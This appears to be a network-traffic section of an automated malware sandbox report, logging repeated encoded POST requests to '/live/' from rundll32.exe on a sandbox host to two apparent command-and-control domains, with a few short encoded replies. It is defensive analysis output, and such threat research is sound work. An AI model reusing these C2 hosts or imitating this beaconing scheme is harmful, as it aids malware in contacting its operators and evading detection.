2024-04-26 21:22:07 UTC	180	OUT	Data Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 6f 41 73 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 54 35 78 33 48 39 39 57 70 4c 57 4b 4f 56 62 6e 78 36 79 49 70 77 64 48 78 6d 72 42 38 6d 58 4b 6e 63 70 43 51 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 64 69 48 31 44 49 4a 6a 4a 33 6f 4c 41 55 39 55 73 4d 47 77 59 55 77 78 69 54 6f 52 70 35 44 5a 4f 37 2f 39 66 6a 48 57 47 47 50 42 6a 6b 4f 75 65 34 42 48 61 30 39 56 39 2b 39 4b 58 38 2f 61 6d 73 64 31 42 57 32 69 30 71 70 6b 48 59 45 48 6b 3d Data Ascii: YjOeEyiMk3RoAsnRAuSOBaZcysivUksT5x3H99WpLWKOVbnx6yIpwdHxmrB8mXKncpCQEaladd8ChZLHKfeppcTqPmDGfhvItzdiH1DIJjJ3oLAU9UsMGwYUwxiToRp5DZO7/9fjHWGGPBjkOue4BHa09V9+9KX8/amsd1BW2i0qpkHYEHk=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.2.4	49810	172.67.219.28	443	7784	C:\Windows\System32\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 21:22:12 UTC	227	OUT	POST /live/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: grizmotras.com Content-Length: 180 Cache-Control: no-cache
2024-04-26 21:22:12 UTC	180	OUT	Data Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 6f 41 73 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 54 35 78 33 48 39 39 57 70 4c 57 4b 4f 56 62 6e 78 36 79 49 70 77 64 48 78 6d 72 42 38 6d 58 4b 6e 63 70 43 51 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 64 69 48 31 44 49 4a 6a 4a 33 6f 4c 41 55 39 55 73 4d 47 77 59 55 77 78 69 54 6f 52 70 35 44 5a 4f 37 2f 39 66 6a 48 57 47 47 50 42 6a 6b 4f 75 65 34 42 48 61 30 39 56 39 2b 39 4b 58 38 36 72 36 79 65 6c 56 4c 7a 7a 45 75 6f 55 48 59 45 48 6b 3d Data Ascii: YjOeEyiMk3RoAsnRAuSOBaZcysivUksT5x3H99WpLWKOVbnx6yIpwdHxmrB8mXKncpCQEaladd8ChZLHKfeppcTqPmDGfhvItzdiH1DIJjJ3oLAU9UsMGwYUwxiToRp5DZO7/9fjHWGGPBjkOue4BHa09V9+9KX86r6yelVLzzEuoUHYEHk=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
61	192.168.2.4	49811	172.67.197.34	443	7784	C:\Windows\System32\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 21:22:16 UTC	227	OUT	POST /live/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: pewwhranet.com Content-Length: 180 Cache-Control: no-cache
2024-04-26 21:22:16 UTC	180	OUT	Data Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 6f 41 73 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 54 35 78 33 48 39 39 57 70 4c 57 4b 4f 56 62 6e 78 36 79 49 70 77 64 48 78 6d 72 42 38 6d 58 4b 6e 63 70 43 51 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 64 69 48 31 44 49 4a 6a 4a 33 6f 4c 41 55 39 55 73 4d 47 77 59 55 77 78 69 54 6f 52 70 35 44 5a 4f 37 2f 39 66 6a 48 57 47 47 50 42 6a 6b 4f 75 65 34 42 48 61 30 39 56 39 2b 39 4b 58 38 2f 61 6d 73 64 31 42 57 32 69 30 71 70 6b 48 59 45 48 6b 3d Data Ascii: YjOeEyiMk3RoAsnRAuSOBaZcysivUksT5x3H99WpLWKOVbnx6yIpwdHxmrB8mXKncpCQEaladd8ChZLHKfeppcTqPmDGfhvItzdiH1DIJjJ3oLAU9UsMGwYUwxiToRp5DZO7/9fjHWGGPBjkOue4BHa09V9+9KX8/amsd1BW2i0qpkHYEHk=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
62	192.168.2.4	49812	172.67.219.28	443	7784	C:\Windows\System32\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 21:22:20 UTC	227	OUT	POST /live/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: grizmotras.com Content-Length: 180 Cache-Control: no-cache
2024-04-26 21:22:20 UTC	180	OUT	Data Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 6f 41 73 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 54 35 78 33 48 39 39 57 70 4c 57 4b 4f 56 62 6e 78 36 79 49 70 77 64 48 78 6d 72 42 38 6d 58 4b 6e 63 70 43 51 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 64 69 48 31 44 49 4a 6a 4a 33 6f 4c 41 55 39 55 73 4d 47 77 59 55 77 78 69 54 6f 52 70 35 44 5a 4f 37 2f 39 66 6a 48 57 47 47 50 42 6a 6b 4f 75 65 34 42 48 61 30 39 56 39 2b 39 4b 58 38 36 72 36 79 65 6c 56 4c 7a 7a 45 75 6f 55 48 59 45 48 6b 3d Data Ascii: YjOeEyiMk3RoAsnRAuSOBaZcysivUksT5x3H99WpLWKOVbnx6yIpwdHxmrB8mXKncpCQEaladd8ChZLHKfeppcTqPmDGfhvItzdiH1DIJjJ3oLAU9UsMGwYUwxiToRp5DZO7/9fjHWGGPBjkOue4BHa09V9+9KX86r6yelVLzzEuoUHYEHk=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
63	192.168.2.4	49813	172.67.197.34	443	7784	C:\Windows\System32\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 21:22:25 UTC	227	OUT	POST /live/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: pewwhranet.com Content-Length: 180 Cache-Control: no-cache
2024-04-26 21:22:25 UTC	180	OUT	Data Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 6f 41 73 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 54 35 78 33 48 39 39 57 70 4c 57 4b 4f 56 62 6e 78 36 79 49 70 77 64 48 78 6d 72 42 38 6d 58 4b 6e 63 70 43 51 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 64 69 48 31 44 49 4a 6a 4a 33 6f 4c 41 55 39 55 73 4d 47 77 59 55 77 78 69 54 6f 52 70 35 44 5a 4f 37 2f 39 66 6a 48 57 47 47 50 42 6a 6b 4f 75 65 34 42 48 61 30 39 56 39 2b 39 4b 58 38 2f 61 6d 73 64 31 42 57 32 69 30 71 70 6b 48 59 45 48 6b 3d Data Ascii: YjOeEyiMk3RoAsnRAuSOBaZcysivUksT5x3H99WpLWKOVbnx6yIpwdHxmrB8mXKncpCQEaladd8ChZLHKfeppcTqPmDGfhvItzdiH1DIJjJ3oLAU9UsMGwYUwxiToRp5DZO7/9fjHWGGPBjkOue4BHa09V9+9KX8/amsd1BW2i0qpkHYEHk=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
64	192.168.2.4	49814	172.67.219.28	443	7784	C:\Windows\System32\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 21:22:29 UTC	227	OUT	POST /live/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: grizmotras.com Content-Length: 180 Cache-Control: no-cache
2024-04-26 21:22:29 UTC	180	OUT	Data Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 6f 41 73 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 54 35 78 33 48 39 39 57 70 4c 57 4b 4f 56 62 6e 78 36 79 49 70 77 64 48 78 6d 72 42 38 6d 58 4b 6e 63 70 43 51 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 64 69 48 31 44 49 4a 6a 4a 33 6f 4c 41 55 39 55 73 4d 47 77 59 55 77 78 69 54 6f 52 70 35 44 5a 4f 37 2f 39 66 6a 48 57 47 47 50 42 6a 6b 4f 75 65 34 42 48 61 30 39 56 39 2b 39 4b 58 38 36 72 36 79 65 6c 56 4c 7a 7a 45 75 6f 55 48 59 45 48 6b 3d Data Ascii: YjOeEyiMk3RoAsnRAuSOBaZcysivUksT5x3H99WpLWKOVbnx6yIpwdHxmrB8mXKncpCQEaladd8ChZLHKfeppcTqPmDGfhvItzdiH1DIJjJ3oLAU9UsMGwYUwxiToRp5DZO7/9fjHWGGPBjkOue4BHa09V9+9KX86r6yelVLzzEuoUHYEHk=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
65	192.168.2.4	49815	172.67.197.34	443	7784	C:\Windows\System32\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 21:22:33 UTC	227	OUT	POST /live/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: pewwhranet.com Content-Length: 180 Cache-Control: no-cache
2024-04-26 21:22:33 UTC	180	OUT	Data Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 6f 41 73 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 54 35 78 33 48 39 39 57 70 4c 57 4b 4f 56 62 6e 78 36 79 49 70 77 64 48 78 6d 72 42 38 6d 58 4b 6e 63 70 43 51 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 64 69 48 31 44 49 4a 6a 4a 33 6f 4c 41 55 39 55 73 4d 47 77 59 55 77 78 69 54 6f 52 70 35 44 5a 4f 37 2f 39 66 6a 48 57 47 47 50 42 6a 6b 4f 75 65 34 42 48 61 30 39 56 39 2b 39 4b 58 38 2f 61 6d 73 64 31 42 57 32 69 30 71 70 6b 48 59 45 48 6b 3d Data Ascii: YjOeEyiMk3RoAsnRAuSOBaZcysivUksT5x3H99WpLWKOVbnx6yIpwdHxmrB8mXKncpCQEaladd8ChZLHKfeppcTqPmDGfhvItzdiH1DIJjJ3oLAU9UsMGwYUwxiToRp5DZO7/9fjHWGGPBjkOue4BHa09V9+9KX8/amsd1BW2i0qpkHYEHk=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
66	192.168.2.4	49816	172.67.219.28	443	7784	C:\Windows\System32\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 21:22:37 UTC	227	OUT	POST /live/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: grizmotras.com Content-Length: 180 Cache-Control: no-cache
2024-04-26 21:22:37 UTC	180	OUT	Data Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 6f 41 73 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 54 35 78 33 48 39 39 57 70 4c 57 4b 4f 56 62 6e 78 36 79 49 70 77 64 48 78 6d 72 42 38 6d 58 4b 6e 63 70 43 51 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 64 69 48 31 44 49 4a 6a 4a 33 6f 4c 41 55 39 55 73 4d 47 77 59 55 77 78 69 54 6f 52 70 35 44 5a 4f 37 2f 39 66 6a 48 57 47 47 50 42 6a 6b 4f 75 65 34 42 48 61 30 39 56 39 2b 39 4b 58 38 36 72 36 79 65 6c 56 4c 7a 7a 45 75 6f 55 48 59 45 48 6b 3d Data Ascii: YjOeEyiMk3RoAsnRAuSOBaZcysivUksT5x3H99WpLWKOVbnx6yIpwdHxmrB8mXKncpCQEaladd8ChZLHKfeppcTqPmDGfhvItzdiH1DIJjJ3oLAU9UsMGwYUwxiToRp5DZO7/9fjHWGGPBjkOue4BHa09V9+9KX86r6yelVLzzEuoUHYEHk=

Session ID	Source IP	Source Port	Destination IP	Destination Port
67	192.168.2.4	49817	172.67.197.34	443

Timestamp	Bytes transferred	Direction	Data
2024-04-26 21:22:42 UTC	227	OUT	POST /live/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: pewwhranet.com Content-Length: 180 Cache-Control: no-cache
2024-04-26 21:22:42 UTC	180	OUT	Data Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 6f 41 73 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 54 35 78 33 48 39 39 57 70 4c 57 4b 4f 56 62 6e 78 36 79 49 70 77 64 48 78 6d 72 42 38 6d 58 4b 6e 63 70 43 51 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 64 69 48 31 44 49 4a 6a 4a 33 6f 4c 41 55 39 55 73 4d 47 77 59 55 77 78 69 54 6f 52 70 35 44 5a 4f 37 2f 39 66 6a 48 57 47 47 50 42 6a 6b 4f 75 65 34 42 48 61 30 39 56 39 2b 39 4b 58 38 2f 61 6d 73 64 31 42 57 32 69 30 71 70 6b 48 59 45 48 6b 3d Data Ascii: YjOeEyiMk3RoAsnRAuSOBaZcysivUksT5x3H99WpLWKOVbnx6yIpwdHxmrB8mXKncpCQEaladd8ChZLHKfeppcTqPmDGfhvItzdiH1DIJjJ3oLAU9UsMGwYUwxiToRp5DZO7/9fjHWGGPBjkOue4BHa09V9+9KX8/amsd1BW2i0qpkHYEHk=

Session ID	Source IP	Source Port	Destination IP	Destination Port
68	192.168.2.4	49818	172.67.219.28	443

Timestamp	Bytes transferred	Direction	Data
2024-04-26 21:22:46 UTC	227	OUT	POST /live/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: grizmotras.com Content-Length: 180 Cache-Control: no-cache
2024-04-26 21:22:46 UTC	180	OUT	Data Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 6f 41 73 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 54 35 78 33 48 39 39 57 70 4c 57 4b 4f 56 62 6e 78 36 79 49 70 77 64 48 78 6d 72 42 38 6d 58 4b 6e 63 70 43 51 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 64 69 48 31 44 49 4a 6a 4a 33 6f 4c 41 55 39 55 73 4d 47 77 59 55 77 78 69 54 6f 52 70 35 44 5a 4f 37 2f 39 66 6a 48 57 47 47 50 42 6a 6b 4f 75 65 34 42 48 61 30 39 56 39 2b 39 4b 58 38 36 72 36 79 65 6c 56 4c 7a 7a 45 75 6f 55 48 59 45 48 6b 3d Data Ascii: YjOeEyiMk3RoAsnRAuSOBaZcysivUksT5x3H99WpLWKOVbnx6yIpwdHxmrB8mXKncpCQEaladd8ChZLHKfeppcTqPmDGfhvItzdiH1DIJjJ3oLAU9UsMGwYUwxiToRp5DZO7/9fjHWGGPBjkOue4BHa09V9+9KX86r6yelVLzzEuoUHYEHk=
2024-04-26 21:22:50 UTC	584	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 21:22:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UuxCjCZhNNAFtlDdn%2BXxwChfhiClUwuAPiZYpnxbiHEPLzLr7VUb2Z%2BUgbFftTC4tBf%2BaMdSFLgxfqmDoeqZIDZmiZEkPmiu0sN%2BaOLvq%2FIOxGfL%2Fe%2B0TQh8OotyAeA1SQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87a9a1518c6521b5-MIA alt-svc: h3=":443"; ma=86400
2024-04-26 21:22:50 UTC	118	IN	Data Raw: 37 30 0d 0a 51 68 43 75 50 41 36 38 73 77 56 57 50 37 72 33 4e 38 65 58 43 4f 73 53 32 63 6d 32 52 55 78 34 6a 6a 6a 77 71 35 7a 38 41 43 58 4c 42 76 2b 63 79 6e 6b 43 33 6f 36 71 32 35 4d 52 31 6a 36 77 45 2b 33 30 53 2f 64 56 49 4a 31 51 6c 4a 4f 65 62 75 58 6f 35 73 62 75 4d 32 44 4a 63 52 50 5a 70 44 35 69 48 42 72 58 61 53 4e 67 34 4d 68 75 0d 0a Data Ascii: 70QhCuPA68swVWP7r3N8eXCOsS2cm2RUx4jjjwq5z8ACXLBv+cynkC3o6q25MR1j6wE+30S/dVIJ1QlJOebuXo5sbuM2DJcRPZpD5iHBrXaSNg4Mhu
2024-04-26 21:22:50 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
69	192.168.2.4	49819	172.67.219.28	443

Timestamp	Bytes transferred	Direction	Data
2024-04-26 21:22:50 UTC	227	OUT	POST /live/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: grizmotras.com Content-Length: 180 Cache-Control: no-cache
2024-04-26 21:22:50 UTC	180	OUT	Data Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 6f 44 63 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 54 35 78 33 48 39 39 57 70 4c 57 4b 4f 56 62 6e 78 36 79 49 70 77 64 48 78 6d 72 42 38 6d 58 4b 6e 63 70 43 51 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 64 69 48 31 44 49 4a 6a 4a 33 6f 4c 41 55 39 55 73 4d 47 77 59 55 77 78 69 54 6f 52 70 35 44 5a 4f 37 2f 39 66 6a 48 57 47 47 50 42 6a 6b 4f 75 65 34 42 48 61 30 39 56 39 2b 39 4b 58 38 36 72 36 79 65 6c 56 4c 7a 7a 45 75 6f 55 48 59 45 48 6b 3d Data Ascii: YjOeEyiMk3RoDcnRAuSOBaZcysivUksT5x3H99WpLWKOVbnx6yIpwdHxmrB8mXKncpCQEaladd8ChZLHKfeppcTqPmDGfhvItzdiH1DIJjJ3oLAU9UsMGwYUwxiToRp5DZO7/9fjHWGGPBjkOue4BHa09V9+9KX86r6yelVLzzEuoUHYEHk=
2024-04-26 21:22:54 UTC	578	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 21:22:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=doUXhMSD4jP8jQc5%2FAzF42xux0pacSUkUOri%2Bt4%2FZLtuEsaGcdaoCqn0WvEk1F5h%2Bun2FhpTeoEQXLWD9utj6du5pbu5DgSiTsPZAUtkB4uAb423prXwc2BfCf9InMr8GA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87a9a16b0a3b8db5-MIA alt-svc: h3=":443"; ma=86400
2024-04-26 21:22:54 UTC	118	IN	Data Raw: 37 30 0d 0a 51 68 43 75 50 41 36 38 73 77 56 57 50 37 72 33 4e 38 65 58 43 4f 73 53 32 63 6d 32 52 55 78 34 6a 6a 6a 77 71 35 7a 38 41 43 58 4c 42 76 2b 63 79 6e 6b 43 33 6f 36 71 32 35 4d 52 31 6a 36 77 45 2b 33 30 53 2f 64 56 49 4a 31 51 6c 4a 4f 65 62 75 58 6f 35 73 62 75 4d 32 44 4a 63 52 50 5a 70 44 35 69 48 42 72 58 61 53 4e 67 34 4d 68 75 0d 0a Data Ascii: 70QhCuPA68swVWP7r3N8eXCOsS2cm2RUx4jjjwq5z8ACXLBv+cynkC3o6q25MR1j6wE+30S/dVIJ1QlJOebuXo5sbuM2DJcRPZpD5iHBrXaSNg4Mhu
2024-04-26 21:22:54 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
70	192.168.2.4	49820	172.67.219.28	443

Timestamp	Bytes transferred	Direction	Data
2024-04-26 21:22:54 UTC	227	OUT	POST /live/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: grizmotras.com Content-Length: 180 Cache-Control: no-cache
2024-04-26 21:22:54 UTC	180	OUT	Data Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 6f 44 4d 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 54 35 78 33 48 39 39 57 70 4c 57 4b 4f 56 62 6e 78 36 79 49 70 77 64 48 78 6d 72 42 38 6d 58 4b 6e 63 70 43 51 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 64 69 48 31 44 49 4a 6a 4a 33 6f 4c 41 55 39 55 73 4d 47 77 59 55 77 78 69 54 6f 52 70 35 44 5a 4f 37 2f 39 66 6a 48 57 47 47 50 42 6a 6b 4f 75 65 34 42 48 61 30 39 56 39 2b 39 4b 58 38 36 72 36 79 65 6c 56 4c 7a 7a 45 75 6f 55 48 59 45 48 6b 3d Data Ascii: YjOeEyiMk3RoDMnRAuSOBaZcysivUksT5x3H99WpLWKOVbnx6yIpwdHxmrB8mXKncpCQEaladd8ChZLHKfeppcTqPmDGfhvItzdiH1DIJjJ3oLAU9UsMGwYUwxiToRp5DZO7/9fjHWGGPBjkOue4BHa09V9+9KX86r6yelVLzzEuoUHYEHk=

Session ID	Source IP	Source Port	Destination IP	Destination Port
71	192.168.2.4	49821	172.67.197.34	443

Timestamp	Bytes transferred	Direction	Data
2024-04-26 21:22:58 UTC	227	OUT	POST /live/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: pewwhranet.com Content-Length: 180 Cache-Control: no-cache
2024-04-26 21:22:58 UTC	180	OUT	Data Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 6f 44 4d 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 54 35 78 33 48 39 39 57 70 4c 57 4b 4f 56 62 6e 78 36 79 49 70 77 64 48 78 6d 72 42 38 6d 58 4b 6e 63 70 43 51 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 64 69 48 31 44 49 4a 6a 4a 33 6f 4c 41 55 39 55 73 4d 47 77 59 55 77 78 69 54 6f 52 70 35 44 5a 4f 37 2f 39 66 6a 48 57 47 47 50 42 6a 6b 4f 75 65 34 42 48 61 30 39 56 39 2b 39 4b 58 38 2f 61 6d 73 64 31 42 57 32 69 30 71 70 6b 48 59 45 48 6b 3d Data Ascii: YjOeEyiMk3RoDMnRAuSOBaZcysivUksT5x3H99WpLWKOVbnx6yIpwdHxmrB8mXKncpCQEaladd8ChZLHKfeppcTqPmDGfhvItzdiH1DIJjJ3oLAU9UsMGwYUwxiToRp5DZO7/9fjHWGGPBjkOue4BHa09V9+9KX8/amsd1BW2i0qpkHYEHk=

Session ID	Source IP	Source Port	Destination IP	Destination Port
72	192.168.2.4	49822	172.67.219.28	443

Timestamp	Bytes transferred	Direction	Data
2024-04-26 21:23:02 UTC	227	OUT	POST /live/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: grizmotras.com Content-Length: 180 Cache-Control: no-cache
2024-04-26 21:23:02 UTC	180	OUT	Data Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 6f 44 4d 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 54 35 78 33 48 39 39 57 70 4c 57 4b 4f 56 62 6e 78 36 79 49 70 77 64 48 78 6d 72 42 38 6d 58 4b 6e 63 70 43 51 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 64 69 48 31 44 49 4a 6a 4a 33 6f 4c 41 55 39 55 73 4d 47 77 59 55 77 78 69 54 6f 52 70 35 44 5a 4f 37 2f 39 66 6a 48 57 47 47 50 42 6a 6b 4f 75 65 34 42 48 61 30 39 56 39 2b 39 4b 58 38 36 72 36 79 65 6c 56 4c 7a 7a 45 75 6f 55 48 59 45 48 6b 3d Data Ascii: YjOeEyiMk3RoDMnRAuSOBaZcysivUksT5x3H99WpLWKOVbnx6yIpwdHxmrB8mXKncpCQEaladd8ChZLHKfeppcTqPmDGfhvItzdiH1DIJjJ3oLAU9UsMGwYUwxiToRp5DZO7/9fjHWGGPBjkOue4BHa09V9+9KX86r6yelVLzzEuoUHYEHk=

Session ID	Source IP	Source Port	Destination IP	Destination Port
73	192.168.2.4	49823	172.67.197.34	443

Timestamp	Bytes transferred	Direction	Data
2024-04-26 21:23:07 UTC	227	OUT	POST /live/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: pewwhranet.com Content-Length: 180 Cache-Control: no-cache
2024-04-26 21:23:07 UTC	180	OUT	Data Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 6f 44 4d 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 54 35 78 33 48 39 39 57 70 4c 57 4b 4f 56 62 6e 78 36 79 49 70 77 64 48 78 6d 72 42 38 6d 58 4b 6e 63 70 43 51 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 64 69 48 31 44 49 4a 6a 4a 33 6f 4c 41 55 39 55 73 4d 47 77 59 55 77 78 69 54 6f 52 70 35 44 5a 4f 37 2f 39 66 6a 48 57 47 47 50 42 6a 6b 4f 75 65 34 42 48 61 30 39 56 39 2b 39 4b 58 38 2f 61 6d 73 64 31 42 57 32 69 30 71 70 6b 48 59 45 48 6b 3d Data Ascii: YjOeEyiMk3RoDMnRAuSOBaZcysivUksT5x3H99WpLWKOVbnx6yIpwdHxmrB8mXKncpCQEaladd8ChZLHKfeppcTqPmDGfhvItzdiH1DIJjJ3oLAU9UsMGwYUwxiToRp5DZO7/9fjHWGGPBjkOue4BHa09V9+9KX8/amsd1BW2i0qpkHYEHk=

Session ID	Source IP	Source Port	Destination IP	Destination Port
74	192.168.2.4	49824	172.67.219.28	443

Timestamp	Bytes transferred	Direction	Data
2024-04-26 21:23:11 UTC	227	OUT	POST /live/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: grizmotras.com Content-Length: 180 Cache-Control: no-cache
2024-04-26 21:23:11 UTC	180	OUT	Data Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 6f 44 4d 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 54 35 78 33 48 39 39 57 70 4c 57 4b 4f 56 62 6e 78 36 79 49 70 77 64 48 78 6d 72 42 38 6d 58 4b 6e 63 70 43 51 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 64 69 48 31 44 49 4a 6a 4a 33 6f 4c 41 55 39 55 73 4d 47 77 59 55 77 78 69 54 6f 52 70 35 44 5a 4f 37 2f 39 66 6a 48 57 47 47 50 42 6a 6b 4f 75 65 34 42 48 61 30 39 56 39 2b 39 4b 58 38 36 72 36 79 65 6c 56 4c 7a 7a 45 75 6f 55 48 59 45 48 6b 3d Data Ascii: YjOeEyiMk3RoDMnRAuSOBaZcysivUksT5x3H99WpLWKOVbnx6yIpwdHxmrB8mXKncpCQEaladd8ChZLHKfeppcTqPmDGfhvItzdiH1DIJjJ3oLAU9UsMGwYUwxiToRp5DZO7/9fjHWGGPBjkOue4BHa09V9+9KX86r6yelVLzzEuoUHYEHk=
